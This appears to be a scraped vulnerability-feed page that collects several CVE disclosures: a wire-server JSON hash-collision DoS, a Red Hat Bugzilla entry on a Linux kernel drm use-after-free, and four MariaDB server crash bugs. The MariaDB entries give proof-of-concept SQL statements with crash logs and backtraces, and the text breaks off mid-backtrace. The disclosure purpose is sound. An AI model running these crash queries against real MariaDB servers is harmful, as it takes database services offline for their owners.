Wire-server is the system server for the wire back-end services. Releases prior to v2022-03-01 are subject to a denial of service attack via a crafted object causing a hash collision. This collision causes the server to spend at least quadratic time parsing it which can lead to a denial of service for a heavily used server. The issue has been fixed in wire-server 2022-03-01 and is already deployed on all Wire managed services. On premise instances of wire-server need to be updated to 2022-03-01, so that their backends are no longer affected. There are no known workarounds for this issue.

CVE-2021-41119: CS SYD - JSON Vulnerability in Haskell's Aeson library

A use-after-free vulnerability was found in drm_lease_held in drivers/gpu/drm/drm_lease.c in the Linux kernel due to a race problem. This flaw allows a local user privilege attacker to cause a denial of service (DoS) or a kernel information leak.

*   
*   
*   
*   
*   
*   

**Bug 2071022** (CVE-2022-1280) - CVE-2022-1280 kernel: concurrency use-after-free between drm\_setmaster\_ioctl and drm\_mode\_getresources

Summary: CVE-2022-1280 kernel: concurrency use-after-free between drm\_setmaster\_ioctl ...

Keywords:

Status:

NEW

Alias:

CVE-2022-1280

Product:

Security Response

Classification:

Other

Component:

vulnerability

Sub Component:

Version:

unspecified

Hardware:

All

OS:

Linux

Priority:

medium

Severity:

medium

Target Milestone:

\---

Assignee:

Red Hat Product Security

QA Contact:

Docs Contact:

URL:

Whiteboard:

Duplicates (1):

2073427 (view as bug list)

Depends On:

2072198 2072199 2073757 2073758

Blocks:

2071023 2073430

TreeView+

depends on / blocked

Reported:

2022-04-01 15:10 UTC by Marian Rehak

Modified:

2022-04-13 11:39 UTC (History)

CC List:

52 users (show)

Fixed In Version:

Doc Type:

If docs needed, set a value

Doc Text:

A use-after-free vulnerability was found in drm\_lease\_held in drivers/gpu/drm/drm\_lease.c in the Linux kernel due to a race problem. This flaw allows a local user privilege attacker to cause a denial of service (DoS) or a kernel information leak.

Clone Of:

Environment:

Last Closed:

  

Attachments

(Terms of Use)

Add an attachment (proposed patch, testcase, etc.)

  

Description Marian Rehak 2022-04-01 15:10:27 UTC

The root cause of this race is that drm\_setmaster\_ioctl can free an old \*fpriv->master\* in drm\_new\_set\_master, while drm\_mode\_getresources holds a freed \*fpriv->master \*in drm\_lease\_held due to the absence of proper lock.

References:

https://www.openwall.com/lists/oss-security/2022/04/12/3

Comment 11 Pedro Sampaio 2022-04-11 12:34:20 UTC

\*\*\* Bug 2073427 has been marked as a duplicate of this bug. \*\*\*

Note You need to log in before you can comment on or make changes to this bug.

*   
*   
*   
*   
*   
*

CVE-2022-1280: concurrency use-after-free between drm_setmaster_ioctl and drm_mode_getresources

An access control issue in the authentication module of wizplat PD065 v1.19 allows attackers to access sensitive data and cause a Denial of Service (DoS).

CVE-2021-46167

An issue in the component Create_tmp_table::finalize of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

PoC:

CREATE TABLE v0 ( v2 DATE DEFAULT ( v1 MOD 68321183.000000 ) , v1 DATETIME NULL ) ;

 SHOW DATABASES LIKE 'x' ;

 SELECT DISTINCT v2 , v1 , DEFAULT ( v2 ) FROM v0 ;

Crash Log:

We will try our best to scrape up some info that will hopefully help  
diagnose the problem, but since we have already crashed,  
something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7fbccf9b6850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7fbcf53e9c3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55da8b1e8747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55da8a1b0120\]

sigaction.c:0(\_\_restore\_rt)\[0x7fbcf4dd3870\]

sql/sql\_select.cc:19307(Create\_tmp\_table::finalize(THD\*, TABLE\*, TMP\_TABLE\_PARAM\*, bool, bool))\[0x55da89b716a6\]

sql/sql\_select.cc:19606(create\_tmp\_table(THD\*, TMP\_TABLE\_PARAM\*, List<Item>&, st\_order\*, bool, bool, unsigned long long, unsigned long long, st\_mysql\_const\_lex\_string const\*, bool, bool))\[0x55da89b736a4\]

sql/sql\_select.cc:4015(JOIN::create\_postjoin\_aggr\_table(st\_join\_table\*, List<Item>\*, st\_order\*, bool, bool, bool))\[0x55da89ba26b3\]

sql/sql\_select.cc:3589(JOIN::make\_aggr\_tables\_info())\[0x55da89ba5424\]

sql/sql\_select.cc:3225(JOIN::optimize\_stage2())\[0x55da89bd5e72\]

sql/sql\_select.cc:2479(JOIN::optimize\_inner())\[0x55da89bdfd07\]

sql/sql\_select.cc:1811(JOIN::optimize())\[0x55da89be17b1\]

sql/sql\_select.cc:4977(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x55da89be1a0e\]

sql/sql\_select.cc:545(handle\_select(THD\*, LEX\*, select\_result\*, unsigned long))\[0x55da89be3655\]

sql/sql\_parse.cc:6256(execute\_sqlcom\_select(THD\*, TABLE\_LIST\*))\[0x55da89a26d7d\]

sql/sql\_parse.cc:3946(mysql\_execute\_command(THD\*, bool))\[0x55da89a50421\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x55da89a555a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x55da89a5b60c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55da89a6073d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x55da89e1be57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x55da89e1c33d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x55da8a8acc2c\]

pthread\_create.c:0(start\_thread)\[0x7fbcf4dc9259\]

:0(\_\_GI\_\_\_clone)\[0x7fbcf49745e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): SELECT DISTINCT v2 , v1 , DEFAULT ( v2 ) FROM v0

Connection ID (thread ID): 4

Status: NOT\_KILLED

CVE-2022-27378: [MDEV-26423] MariaDB server crash in Create_tmp_table::finalize

An issue in the component Arg_comparator::compare_real_fixed of MariaDB Server v10.6.2 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

CREATE TEMPORARY TABLE v0 ( v4 SMALLINT , v3 TINYINT , v2 NCHAR BINARY GENERATED ALWAYS AS ( NULL NOT IN ( 'x' SOUNDS LIKE UTC\_TIME ( ) IS NULL IS NULL IS FALSE ) IS NOT FALSE ) , v1 INT ) ;

 SELECT CONVERT ( CHAR ( 'x' IS FALSE ) \* DEFAULT ( v2 ) \* 'x' \* 62721821.000000 , DATETIME ) REGEXP v1 'x' FROM v0 ;

 INSERT IGNORE INTO v0 VALUES ( 78470821.000000 , 'x' , -32768 , v1 IN ( 'x' , FALSE NOT REGEXP v3 IS FALSE ) ) ;

Core was generated by \`/home/supersix/fuzz/security/MariaDB/install\_debug/bin/mysqld --defaults-file=/'.

Program terminated with signal SIGABRT, Aborted.

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0x6)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

56	../sysdeps/unix/sysv/linux/pthread\_kill.c: No such file or directory.

\[Current thread is 1 (Thread 0x7f8010296700 (LWP 1431325))\]

gdb-peda$ bt

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0x6)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1  0x000055ceeec1e94f in my\_write\_core (sig=sig@entry=0x6)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x000055ceee729d60 in handle\_fatal\_signal (sig=0x6)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3  <signal handler called>

#4  \_\_GI\_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50

#5  0x00007f8010d68859 in \_\_GI\_abort () at abort.c:79

#6  0x00007f801113f951 in ?? () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#7  0x00007f801114b47c in ?? () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#8  0x00007f801114b4e7 in std::terminate() () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#9  0x00007f801114c245 in \_\_cxa\_pure\_virtual () from /lib/x86\_64-linux-gnu/libstdc++.so.6

#10 0x000055ceee75d6ef in Arg\_comparator::compare\_real\_fixed (this=0x7f7f88115bf0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:897

#11 0x000055ceee76b464 in Arg\_comparator::compare (this=0x7f7f88115bf0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.h:103

#12 Item\_func\_ne::val\_int (this=0x7f7f88115b40)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1788

#13 0x000055ceee67b604 in Type\_handler\_int\_result::Item\_val\_bool (this=<optimized out>,

    item=<optimized out>) at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_type.cc:5085

#14 0x000055ceee75de10 in Item\_func\_truth::val\_bool (this=0x7f7f88115dc0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1165

#15 0x000055ceee75de81 in Item\_func\_truth::val\_int (this=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1188

#16 0x000055ceee74f443 in Item::save\_int\_in\_field (this=0x7f7f88115dc0, field=0x7f7f8801ac90,

    no\_conversions=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:6700

#17 0x000055ceee7412a7 in Item::save\_in\_field (this=0x7f7f88115dc0, field=0x7f7f8801ac90,

    no\_conversions=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:6710

#18 0x000055ceee5f87a0 in TABLE::update\_virtual\_fields (this=this@entry=0x7f7f8801a698,

    h=<optimized out>, update\_mode=update\_mode@entry=VCOL\_UPDATE\_FOR\_WRITE)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:8718

#19 0x000055ceee4ba3a5 in fill\_record (thd=thd@entry=0x7f7f88000c58,

    table=table@entry=0x7f7f8801a698, ptr=0x7f7f8801aaf0, ptr@entry=0x7f7f8801aac8, values=...,

    ignore\_errors=ignore\_errors@entry=0x0, use\_value=use\_value@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_base.cc:8845

#20 0x000055ceee4ba444 in fill\_record\_n\_invoke\_before\_triggers (thd=thd@entry=0x7f7f88000c58,

    table=table@entry=0x7f7f8801a698, ptr=0x7f7f8801aac8, values=...,

    ignore\_errors=ignore\_errors@entry=0x0, event=event@entry=TRG\_EVENT\_INSERT)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_base.cc:8888

#21 0x000055ceee4e6af6 in mysql\_insert (thd=thd@entry=0x7f7f88000c58, table\_list=<optimized out>,

    fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>,

    ignore=<optimized out>, result=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_insert.cc:1047

#22 0x000055ceee5204e7 in mysql\_execute\_command (thd=0x7f7f88000c58,

    is\_called\_from\_prepared\_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:4568

#23 0x000055ceee510287 in mysql\_parse (thd=0x7f7f88000c58, rawbuf=<optimized out>,

    length=<optimized out>, parser\_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#24 0x000055ceee51c285 in dispatch\_command (command=COM\_QUERY, thd=0x7f7f88000c58,

    packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:1340

#25 0x000055ceee51e1a8 in do\_command (thd=0x7f7f88000c58, blocking=blocking@entry=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#26 0x000055ceee624317 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#27 0x000055ceee62467d in handle\_one\_connection (arg=arg@entry=0x55cef0328838)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#28 0x000055ceee96097d in pfs\_spawn\_thread (arg=0x55cef06008d8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#29 0x00007f8011291609 in start\_thread (arg=<optimized out>) at pthread\_create.c:477

#30 0x00007f8010e65293 in clone () at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

CVE-2022-27379: [MDEV-26353] MariaDB server crash in Arg_comparator::compare_real_fixed

An issue in the component my_decimal::operator= of MariaDB Server v10.6.3 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

step to reproduce:

CREATE TABLE v0 ( v1 INTEGER UNIQUE , v2 INT UNIQUE ) ; 

INSERT INTO v0 ( v2 , v1 ) VALUES ( 26 , 8 ) ;

 UPDATE v0 SET v1 = CASE 41219694.000000 WHEN 0 THEN 'x' WHEN 'x' THEN 'x' END ORDER BY v1 , ( SELECT 25027969.000000 UNION SELECT 0 UNION SELECT -1 ) , v2 DESC , v2 , v1 ;

Core was generated by \`/home/supersix/fuzz/security/MariaDB/install/bin/mysqld --defaults-file=/home/s'.Program terminated with signal SIGSEGV, Segmentation fault.

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

56	../sysdeps/unix/sysv/linux/pthread\_kill.c: No such file or directory.

\[Current thread is 1 (Thread 0x7f62f009b700 (LWP 166191))\]

gdb-peda$ bt

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1  0x000055fcfb78307f in my\_write\_core (sig=sig@entry=0xb)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x000055fcfb107f80 in handle\_fatal\_signal (sig=0xb)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3  <signal handler called>

#4  0x000055fcfb26d753 in my\_decimal::operator= (rhs=..., this=0x7f62f0099560)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/my\_decimal.h:353

#5  my\_decimal2decimal (to=0x7f62f0099560, from=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/my\_decimal.h:353

#6  my\_decimal::to\_binary (this=0x0, bin=bin@entry=0x7f61f8192e8d "\\177", prec=0xf, scale=0x6,

    mask=mask@entry=0x1e)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/my\_decimal.cc:206

#7  0x000055fcfb101f64 in Type\_handler\_decimal\_result::make\_sort\_key\_part (this=<optimized out>,

    to=0x7f61f8192e8d "\\177", item=0x7f61f80132b0, sort\_field=0x7f61f8015df8, param=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/filesort.cc:1321

#8  0x000055fcfb10328d in make\_sortkey (to=0x7f61f8192e8d "\\177", param=0x7f62f00997c0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/filesort.cc:3027

#9  make\_sortkey (param=param@entry=0x7f62f00997c0, to=0x7f61f8192e88 "\\001\\200",

    ref\_pos=ref\_pos@entry=0x7f61f81846e0 "", using\_packed\_sortkeys=using\_packed\_sortkeys@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/filesort.cc:1354

#10 0x000055fcfb106107 in find\_all\_keys (found\_rows=0x7f61f818faa0, pq=0x7f62f0099770,

    tempfile=0x7f62f0099880, buffpek\_pointers=0x7f62f0099970, fs\_info=0x7f61f818f930, select=0x0,

    param=0x7f62f00997c0, thd=0x7f61f8000c58)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/filesort.cc:969

#11 filesort (thd=thd@entry=0x7f61f8000c58, table=table@entry=0x7f61f81833e8,

    filesort=filesort@entry=0x7f62f0099bc0, tracker=0x7f61f8015d58, join=join@entry=0x0,

    first\_table\_bit=first\_table\_bit@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/filesort.cc:357

#12 0x000055fcfaf5300c in mysql\_update (thd=thd@entry=0x7f61f8000c58, table\_list=<optimized out>,

    fields=..., values=..., conds=<optimized out>, order\_num=<optimized out>, order=0x7f61f8011678,

    limit=0xffffffffffffffff, ignore=<optimized out>, found\_return=<optimized out>,

    updated\_return=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_update.cc:796

#13 0x000055fcfae1fd89 in mysql\_execute\_command (thd=0x7f61f8000c58,

    is\_called\_from\_prepared\_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_limit.h:83

#14 0x000055fcfae02e35 in mysql\_parse (thd=0x7f61f8000c58, rawbuf=<optimized out>,

    length=<optimized out>, parser\_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#15 0x000055fcfae15391 in dispatch\_command (command=<optimized out>, thd=0x7f61f8000c58,

    packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:1340

#16 0x000055fcfae18652 in do\_command (thd=0x7f61f8000c58, blocking=blocking@entry=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#17 0x000055fcfafb336e in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#18 0x000055fcfafb3c77 in handle\_one\_connection (arg=arg@entry=0x55fcfe4236c8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#19 0x000055fcfb3df20d in pfs\_spawn\_thread (arg=0x55fcfe4d2e08)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#20 0x00007f62f0eb0609 in start\_thread (arg=<optimized out>) at pthread\_create.c:477

#21 0x00007f62f0a84293 in clone () at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

CVE-2022-27380: [MDEV-26280] MariaDB server crash at my_decimal::operator=

An issue in the component Used_tables_and_const_cache::used_tables_and_const_cache_join of MariaDB Server v10.7 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

PoC:

CREATE TABLE v0 AS SELECT NULL AS v1 FROM DUAL ;

 SELECT \* FROM v0 WHERE unhex ( log2 ( nullif ( NULL , 'x' ) ) ) = 'x' OR 'x' ;

 UPDATE v0 SET v1 = v1 + 86 , v1 = v1 + 2147483647 WHERE ( v1 , v1 ) IN ( ( -128 , -1 ) ) ;

 UPDATE v0 SET v1 = ( SELECT v1 + 16 FROM v0 HAVING v1 + 57 ) ;

Crash Log:

This could be because you hit a bug. It is also possible that this binary  
or one of the libraries it was linked against is corrupt, improperly built,  
or misconfigured. This error can also be caused by malfunctioning hardware.

To report this bug, see https://mariadb.com/kb/en/reporting-bugs

We will try our best to scrape up some info that will hopefully help  
diagnose the problem, but since we have already crashed,  
something is definitely wrong and this may fail.

Server version: 10.7.0-MariaDB  
key\_buffer\_size=134217728  
read\_buffer\_size=131072  
max\_used\_connections=1  
max\_threads=153  
thread\_count=1  
It is possible that mysqld could use up to  
key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K bytes of memory  
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218  
Attempting backtrace. You can use the following information to find out  
where mysqld died. If you see no messages after this, something went  
terribly wrong...  
stack\_bottom = 0x7f856fd77850 thread\_stack 0x5fc00  
sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f858f623c3e\]  
mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x55905678c747\]  
sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x559055754120\]  
sigaction.c:0(\_\_restore\_rt)\[0x7f858f00d870\]  
sql/item.h:5311(Used\_tables\_and\_const\_cache::used\_tables\_and\_const\_cache\_join(Item const\*))\[0x5590557ff227\]  
sql/item.cc:7918(Item\_ref::fix\_fields(THD\*, Item\*\*))\[0x5590557e66b6\]  
sql/item\_func.cc:347(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x5590558e829c\]  
sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x55905514066d\]  
sql/item\_subselect.cc:3903(subselect\_single\_select\_engine::prepare(THD\*))\[0x559055a484f6\]  
sql/item\_subselect.cc:295(Item\_subselect::fix\_fields(THD\*, Item\*\*))\[0x559055a45d05\]  
sql/item.h:1148(Item::fix\_fields\_if\_needed\_for\_scalar(THD\*, Item\*\*))\[0x559054e832ed\]  
sql/sql\_update.cc:2077(multi\_update::prepare(List<Item>&, st\_select\_lex\_unit\*))\[0x5590552d58ed\]  
sql/sql\_select.cc:1684(JOIN::prepare(TABLE\_LIST\*, Item\*, unsigned int, st\_order\*, bool, st\_order\*, Item\*, st\_order\*, st\_select\_lex\*, st\_select\_lex\_unit\*))\[0x559055142817\]  
sql/sql\_select.cc:4967(mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*))\[0x559055186caa\]  
sql/sql\_class.h:4325(THD::is\_error() const)\[0x5590552e4d8c\]  
sql/sql\_parse.cc:4499(mysql\_execute\_command(THD\*, bool))\[0x559054ff4320\]  
sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x559054ff95a1\]  
sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x559054fff60c\]  
sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x55905500473d\]  
sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x5590553bfe57\]  
sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x5590553c033d\]  
perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x559055e50c2c\]  
pthread\_create.c:0(start\_thread)\[0x7f858f003259\]  
:0(\__GI_\_\_clone)\[0x7f858ebae5e3\]

Trying to get some variables.  
Some pointers may be invalid and cause the dump to abort.  
Query (0x629000087238): UPDATE v0 SET v1 = ( SELECT v1 + 16 FROM v0 HAVING v1 + 57 )

Connection ID (thread ID): 4  
Status: NOT\_KILLED

CVE-2022-27385: [MDEV-26415] MariaDB server crash in Used_tables_and_const_cache::used_tables_and_const_cache_join

An issue in the component Item_subselect::init_expr_cache_tracker of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

Steps to reproduce:

CREATE TABLE v0 ( v1 INT PRIMARY KEY ) ;

 INSERT INTO v0 VALUES ( ( ( 23695630.000000 ) ) NOT IN ( SELECT DISTINCT - ( 89 IN ( 127 , 'x' , NULL ) ) IN ( 'x' , 127 ) FROM v0 AS v2 WHERE v1 IS NOT NULL GROUP BY ( ( SELECT DISTINCT - ( 'x' IN ( 65 , NULL ) ) IN ( 'x' , -2147483648 ) AND ( SELECT NULL WHERE - ( 16 ) AND ( v1 IN ( ( ( v1 = v1 ) ) = 'x' ) ) = -2147483648 ) ) ) ORDER BY ( v1 = 'x' AND 84 ) OR ( v1 = 8 AND v1 = -1 ) ASC ) ) ;

 CREATE TABLE v3 ( v4 INTEGER , v5 INT PRIMARY KEY , v6 VARCHAR ( 24 ) , v7 INT , v8 INT , v9 INT ) ;

 INSERT INTO v3 ( v5 ) VALUES ( ( ( - ( ( 'x' IS NOT NULL ) ) ) ) ) , ( 55 BETWEEN - 80445159.000000 AND - ( ( ( SELECT DISTINCT v1 IN ( ( -1 IN ( ( SELECT DISTINCT - ( 58 IN ( ( -128 IN ( 54560735.000000 ) ) ) ) NOT IN ( 'x' , - ( ( 54 IN ( ( NULL IN ( ( SELECT v1 FROM v0 AS v12 WHERE - ( 99 ) AND v1 = 95 GROUP BY 89382485.000000 ) ) ) ) ) ) ) AS v11 ) ) ) = 'x' ) FROM v0 AS v10 WHERE v1 IS NOT NULL GROUP BY 'x' , 5612101.000000 ) ) ) ) ;

Backtrace:  
Core was generated by \`/home/supersix/fuzz/security/MariaDB/install/bin/mysqld --defaults-file=/home/s'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

\[Current thread is 1 (Thread 0x7f0f26251300 (LWP 1437547))\]

gdb-peda$ #0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1  0x0000559d3cff698f in my\_write\_core (sig=sig@entry=0xb)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x0000559d3ba63583 in handle\_fatal\_signal (sig=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3  <signal handler called>

#4  0x0000559d3be106ea in Item\_subselect::init\_expr\_cache\_tracker (

    this=0x6290021eddb8, thd=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_lex.h:982

#5  0x0000559d3be108df in Item\_singlerow\_subselect::expr\_cache\_insert\_transformer (this=0x6290021eddb8, tmp\_thd=0x62b000070218, unused=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_subselect.cc:1389

#6  0x0000559d3bab3024 in Item::transform (this=<optimized out>,

    thd=<optimized out>, transformer=<optimized out>, arg=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:610

#7  0x0000559d3bb7d48a in Item\_cond::transform (this=<optimized out>,

    thd=<optimized out>, transformer=&virtual table offset 1328,

    arg=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:5135

#8  0x0000559d3b235270 in JOIN::setup\_subquery\_caches (this=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4225

#9  0x0000559d3b31b21f in JOIN::optimize\_stage2 (this=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:3065

#10 0x0000559d3b327252 in JOIN::optimize\_inner (this=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:2477

#11 0x0000559d3b329eda in JOIN::optimize (this=this@entry=0x62900222e478)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:1807

#12 0x0000559d3b09fb28 in st\_select\_lex::optimize\_unflattened\_subqueries (

    this=0x62b000079968, const\_only=const\_only@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_lex.cc:4936

#13 0x0000559d3b0643e5 in mysql\_insert (thd=thd@entry=0x62b000070218,

    table\_list=<optimized out>, fields=..., values\_list=...,

    update\_fields=..., update\_values=..., duplic=<optimized out>,

    ignore=<optimized out>, result=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_lex.h:982

#14 0x0000559d3b15ca9c in mysql\_execute\_command (thd=<optimized out>,

    is\_called\_from\_prepared\_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:4568

#15 0x0000559d3b1188dd in mysql\_parse (thd=0x62b000070218,

    rawbuf=<optimized out>, length=<optimized out>,

    parser\_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#16 0x0000559d3b14edb9 in dispatch\_command (command=COM\_QUERY,

    thd=0x62b000070218, packet=<optimized out>, packet\_length=<optimized out>,

    blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1995

#17 0x0000559d3b153704 in do\_command (thd=0x62b000070218,

    blocking=blocking@entry=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#18 0x0000559d3b61314d in do\_handle\_one\_connection (connect=<optimized out>,

    put\_in\_cache=<optimized out>)
